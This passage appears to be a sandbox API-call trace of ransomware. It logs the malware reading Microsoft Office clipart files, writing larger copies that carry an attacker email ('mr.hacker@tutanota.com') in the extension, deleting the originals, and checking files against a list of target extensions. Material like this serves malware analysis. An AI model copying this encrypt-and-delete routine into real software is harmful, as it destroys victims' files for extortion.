office\\clipart\\pub60cor\\j0099146.wmf")) returned 0x20 [0273.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099146.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099146.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.655] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.655] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099146.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.656] GetLastError () returned 0x0 [0273.656] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x40d4, lpOverlapped=0x0) returned 1 [0273.657] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x40e0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x40e0, lpOverlapped=0x0) returned 1 [0273.658] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.658] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.659] SetEndOfFile (hFile=0x2b0) returned 1 [0273.659] CloseHandle (hObject=0x2b0) returned 1 [0273.659] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.659] SetEndOfFile (hFile=0x2ac) returned 1 [0273.661] CloseHandle (hObject=0x2ac) returned 1 [0273.661] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.661] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099146.wmf")) returned 1 [0273.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63 [0273.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63 [0273.661] lstrlenW (lpString=".doc") returned 4 [0273.661] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.661] lstrlenW (lpString=".docx") returned 5 [0273.661] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0273.661] lstrlenW (lpString=".pdf") returned 4 [0273.661] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.661] lstrlenW (lpString=".xls") returned 4 [0273.661] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.661] lstrlenW (lpString=".xlsx") returned 5 [0273.661] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0273.661] lstrlenW (lpString=".ppt") returned 4 [0273.661] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63 [0273.662] lstrlenW (lpString=".zip") returned 4 [0273.662] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.662] lstrlenW (lpString=".rar") returned 4 [0273.662] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.662] lstrlenW (lpString=".bz2") returned 4 [0273.662] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.662] lstrlenW (lpString=".7z") returned 3 [0273.662] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63 [0273.662] lstrlenW (lpString=".dbf") returned 4 [0273.662] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63 [0273.662] lstrlenW (lpString=".1cd") returned 4 [0273.662] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63 [0273.662] lstrlenW (lpString=".jpg") returned 4 [0273.662] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63 [0273.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63 [0273.662] lstrlenW (lpString=".doc") returned 4 [0273.662] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.662] lstrlenW (lpString=".docx") returned 5 [0273.662] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0273.662] lstrlenW (lpString=".pdf") returned 4 [0273.662] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.662] lstrlenW (lpString=".xls") returned 4 [0273.662] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.662] lstrlenW (lpString=".xlsx") returned 5 [0273.662] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0273.662] lstrlenW (lpString=".ppt") returned 4 [0273.662] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63 [0273.663] lstrlenW (lpString=".zip") returned 4 [0273.663] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.663] lstrlenW (lpString=".rar") returned 4 [0273.663] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.663] lstrlenW (lpString=".bz2") returned 4 [0273.663] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.663] lstrlenW (lpString=".7z") returned 3 [0273.663] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63 [0273.663] lstrlenW (lpString=".dbf") returned 4 [0273.663] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63 [0273.663] lstrlenW (lpString=".1cd") returned 4 [0273.663] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63 [0273.663] lstrlenW (lpString=".jpg") returned 4 [0273.663] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.670] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=24377) returned 1 [0273.670] CloseHandle (hObject=0x2ac) returned 1 [0273.670] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099147.jpg")) returned 0x20 [0273.670] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099147.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099147.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.670] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.670] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099147.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.671] GetLastError () returned 0x0 [0273.671] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x5f39, lpOverlapped=0x0) returned 1 [0273.672] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x5f40, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x5f40, lpOverlapped=0x0) returned 1 [0273.673] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.673] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.673] SetEndOfFile (hFile=0x2b0) returned 1 [0273.674] CloseHandle (hObject=0x2b0) returned 1 [0273.674] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.674] SetEndOfFile (hFile=0x2ac) returned 1 [0273.676] CloseHandle (hObject=0x2ac) returned 1 [0273.676] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.676] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099147.jpg")) returned 1 [0273.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63 [0273.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63 [0273.676] lstrlenW (lpString=".doc") returned 4 [0273.676] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0273.676] lstrlenW (lpString=".docx") returned 5 [0273.676] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1 [0273.676] lstrlenW (lpString=".pdf") returned 4 [0273.676] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0273.676] lstrlenW (lpString=".xls") returned 4 [0273.676] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0273.676] lstrlenW (lpString=".xlsx") returned 5 [0273.676] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1 [0273.676] lstrlenW (lpString=".ppt") returned 4 [0273.677] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0273.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63 [0273.677] lstrlenW (lpString=".zip") returned 4 [0273.677] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0273.677] lstrlenW (lpString=".rar") returned 4 [0273.677] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0273.677] lstrlenW (lpString=".bz2") returned 4 [0273.677] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0273.677] lstrlenW (lpString=".7z") returned 3 [0273.677] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0273.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63 [0273.677] lstrlenW (lpString=".dbf") returned 4 [0273.677] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0273.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63 [0273.677] lstrlenW (lpString=".1cd") returned 4 [0273.677] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0273.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 63 [0273.677] lstrlenW (lpString=".jpg") returned 4 [0273.677] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0273.677] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=18258) returned 1 [0273.677] CloseHandle (hObject=0x2ac) returned 1 [0273.678] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099148.jpg")) returned 0x20 [0273.678] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099148.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099148.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.678] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.678] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099148.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.678] GetLastError () returned 0x0 [0273.678] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x4752, lpOverlapped=0x0) returned 1 [0273.844] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x4760, lpOverlapped=0x0) returned 1 [0273.845] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.845] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.845] SetEndOfFile (hFile=0x2b0) returned 1 [0273.845] CloseHandle (hObject=0x2b0) returned 1 [0273.845] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.845] SetEndOfFile (hFile=0x2ac) returned 1 [0273.847] CloseHandle (hObject=0x2ac) returned 1 [0273.847] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.848] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099148.jpg")) returned 1 [0273.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63 [0273.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63 [0273.848] lstrlenW (lpString=".doc") returned 4 [0273.848] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0273.848] lstrlenW (lpString=".docx") returned 5 [0273.848] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1 [0273.848] lstrlenW (lpString=".pdf") returned 4 [0273.848] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0273.848] lstrlenW (lpString=".xls") returned 4 [0273.848] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0273.848] lstrlenW (lpString=".xlsx") returned 5 [0273.848] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1 [0273.848] lstrlenW (lpString=".ppt") returned 4 [0273.849] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0273.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63 [0273.849] lstrlenW (lpString=".zip") returned 4 [0273.849] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0273.849] lstrlenW (lpString=".rar") returned 4 [0273.849] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0273.849] lstrlenW (lpString=".bz2") returned 4 [0273.849] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0273.849] lstrlenW (lpString=".7z") returned 3 [0273.849] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0273.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63 [0273.849] lstrlenW (lpString=".dbf") returned 4 [0273.849] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0273.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63 [0273.849] lstrlenW (lpString=".1cd") returned 4 [0273.849] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0273.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63 [0273.849] lstrlenW (lpString=".jpg") returned 4 [0273.849] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0273.849] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=26086) returned 1 [0273.849] CloseHandle (hObject=0x2ac) returned 1 [0273.850] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099151.wmf")) returned 0x20 [0273.850] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099151.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099151.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.850] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.850] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099151.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.850] GetLastError () returned 0x0 [0273.850] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x65e6, lpOverlapped=0x0) returned 1 [0273.853] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x65f0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x65f0, lpOverlapped=0x0) returned 1 [0273.854] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.854] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.854] SetEndOfFile (hFile=0x2b0) returned 1 [0273.856] CloseHandle (hObject=0x2b0) returned 1 [0273.856] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.856] SetEndOfFile (hFile=0x2ac) returned 1 [0273.858] CloseHandle (hObject=0x2ac) returned 1 [0273.859] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.867] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099151.wmf")) returned 1 [0273.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63 [0273.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63 [0273.875] lstrlenW (lpString=".doc") returned 4 [0273.877] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.877] lstrlenW (lpString=".docx") returned 5 [0273.886] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0273.886] lstrlenW (lpString=".pdf") returned 4 [0273.894] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.894] lstrlenW (lpString=".xls") returned 4 [0273.909] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.909] lstrlenW (lpString=".xlsx") returned 5 [0273.909] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0273.909] lstrlenW (lpString=".ppt") returned 4 [0273.909] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63 [0273.916] lstrlenW (lpString=".zip") returned 4 [0273.916] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.922] lstrlenW (lpString=".rar") returned 4 [0273.922] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.923] lstrlenW (lpString=".bz2") returned 4 [0273.923] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.923] lstrlenW (lpString=".7z") returned 3 [0273.923] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63 [0273.923] lstrlenW (lpString=".dbf") returned 4 [0273.923] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63 [0273.923] lstrlenW (lpString=".1cd") returned 4 [0273.923] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 63 [0273.923] lstrlenW (lpString=".jpg") returned 4 [0273.923] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.328] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.328] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099161.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0274.329] GetLastError () returned 0x0 [0274.329] ReadFile (in: hFile=0x394, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x1bf2, lpOverlapped=0x0) returned 1 [0274.367] 